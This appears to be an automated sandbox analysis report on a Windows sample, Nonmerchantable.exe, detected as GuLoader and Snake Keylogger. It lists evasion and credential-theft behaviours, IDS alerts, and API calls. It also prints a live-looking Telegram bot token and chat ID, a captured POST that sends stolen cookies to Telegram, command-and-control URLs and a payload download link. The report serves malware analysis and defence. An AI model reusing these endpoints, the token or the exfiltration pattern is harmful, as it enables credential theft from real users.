Edit tour

Windows Analysis Report
Nonmerchantable.exe

Overview

General Information

Sample name:	Nonmerchantable.exe
Analysis ID:	1617041
MD5:	0e90c7c0d54420a58998a5e6dfb0ecf1
SHA1:	6b2889f49aa83bd04db89e3b4dc78455670c1272
SHA256:	3193967e6f4f4475cb744fece3bd2e7cdc6b3dce1694d0371e2865305ee3c97b
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Nonmerchantable.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\Nonmerchantable.exe" MD5: 0E90C7C0D54420A58998A5E6DFB0ECF1)

Nonmerchantable.exe (PID: 3236 cmdline: "C:\Users\user\Desktop\Nonmerchantable.exe" MD5: 0E90C7C0D54420A58998A5E6DFB0ECF1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY", "Chat_id": "6838630391", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.3964116665.0000000038882000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.3640382417.00000000051B1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Nonmerchantable.exe PID: 3236	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Nonmerchantable.exe PID: 3236	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:28:18.704262+0100	2803305	3	Unknown Traffic	192.168.2.4	50007	104.21.32.1	443	TCP
2025-02-17T13:28:21.314531+0100	2803305	3	Unknown Traffic	192.168.2.4	50011	104.21.32.1	443	TCP
2025-02-17T13:28:23.921130+0100	2803305	3	Unknown Traffic	192.168.2.4	50015	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:28:16.923276+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	50005	132.226.247.73	80	TCP
2025-02-17T13:28:18.126424+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	50005	132.226.247.73	80	TCP
2025-02-17T13:28:19.454517+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	50008	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:28:11.606380+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	50003	142.250.184.238	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:28:36.970041+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50023	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T13:28:29.318329+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	50022	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendDocument?chat_id=6838630391&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4ff311ff9f78Host: api.telegram.orgContent-Length: 7046

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 12:28:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: Nonmerchantable.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Nonmerchantable.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20a
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.00000000362F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8119135929:AAGv_owQnXugQZM3K0TRex_pZFatMkYkfzY/sendDocument?chat_id=6838
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036321000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036312000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036352000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Nonmerchantable.exe, 00000005.00000002.4179767615.0000000005898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Nonmerchantable.exe, 00000005.00000002.4179767615.0000000005898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/t
Source: Nonmerchantable.exe, 00000005.00000002.4200780131.00000000352D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj
Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQjR
Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQjx
Source: Nonmerchantable.exe, 00000005.00000003.3759305675.0000000005942000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1sSKJNyS14Ryy6O660oUdagb-t8TRMMQj&export=download
Source: Nonmerchantable.exe, 00000005.00000003.3759305675.0000000005942000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3759252914.000000000590B000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000003.3728236743.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/w8
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000361AC000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.000000003621C000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000361AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.00000000361D7000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.000000003621C000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037285000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373DB000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000372AC000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037237000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374DE000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037287000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373B6000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373E1000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037212000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374B9000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.000000003723D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037285000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373DB000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000372AC000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037237000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374DE000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037287000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373B6000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000373E1000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037212000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.00000000374B9000.00000004.00000800.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4203234524.000000003723D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Nonmerchantable.exe, 00000005.00000002.4203234524.0000000037429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Nonmerchantable.exe, 00000005.00000003.3721278117.000000000590B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Nonmerchantable.exe, 00000005.00000002.4201739054.0000000036352000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		0_2_00403348
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		5_2_00403348

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File created: C:\Windows\Behovsundersgelses

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_6F951A98	0_2_6F951A98
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_00406945	5_2_00406945
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0040711C	5_2_0040711C
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585D548	5_2_0585D548
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585C46A	5_2_0585C46A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585C738	5_2_0585C738
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585C19A	5_2_0585C19A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_05857118	5_2_05857118
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_05855370	5_2_05855370
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585D281	5_2_0585D281
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585CCE1	5_2_0585CCE1
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585CFAC	5_2_0585CFAC
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_05859E83	5_2_05859E83
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585E988	5_2_0585E988
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_058569B0	5_2_058569B0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585CA0C	5_2_0585CA0C
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_058529EC	5_2_058529EC
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585E97A	5_2_0585E97A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585F97A	5_2_0585F97A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39255148	5_2_39255148
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39251850	5_2_39251850
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39251FA8	5_2_39251FA8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39259668	5_2_39259668
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39252A90	5_2_39252A90
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3925F922	5_2_3925F922
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3925F930	5_2_3925F930
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39255138	5_2_39255138
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3925CDAF	5_2_3925CDAF
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3925CDC0	5_2_3925CDC0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3925EC28	5_2_3925EC28
